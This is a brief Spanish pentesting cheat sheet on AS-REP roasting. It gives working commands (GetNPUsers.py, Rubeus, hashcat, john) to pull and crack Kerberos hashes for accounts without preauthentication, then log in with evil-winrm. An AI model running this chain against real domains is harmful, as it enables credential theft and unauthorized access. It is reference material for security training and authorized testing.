Skip to content

ASREPRoasting

[!tip] The "Free" Ticket Busca usuarios con la propiedad "Do not require Kerberos preauthentication" habilitada. Puedes solicitar un TGT para ellos sin saber su contraseña, crackearlo offline y ganar acceso. Requisito: Ninguno (solo conexión a la red), o un usuario básico para enumerar otros.

1. Enumeration (Finding the User)

Necesitamos una lista de usuarios del dominio.

Si NO tienes credenciales:

# Intenta adivinar usuarios o usar una lista
GetNPUsers.py <DOMAIN>/ -usersfile users.txt -format hashcat -outputfile hashes.asreproast -dc-ip <DC_IP>
Si TIENES credenciales (de un usuario comprometido):
GetNPUsers.py <DOMAIN>/<USER>:<PASS> -request -format hashcat -outputfile hashes.asreproast -dc-ip <DC_IP>

Desde una máquina en dominio (con o sin creds):

# Buscar y extraer hash automáticamente
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast

Solo enumerar (no ataca):

Get-DomainUser -PreauthNotRequired

2. Cracking (The Prize)

Una vez tienes el archivo hashes.asreproast.

Modo: 18200 (Kerberos 5, etype 23, AS-REP)

hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt --force

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast

3. Next Steps

  1. ¿Password crackeada? -> evil-winrm -i <DC_IP> -u <USER> -p <PASSWORD>
  2. Si entras, vuelve a enumerar. ¡Quizás sea Admin!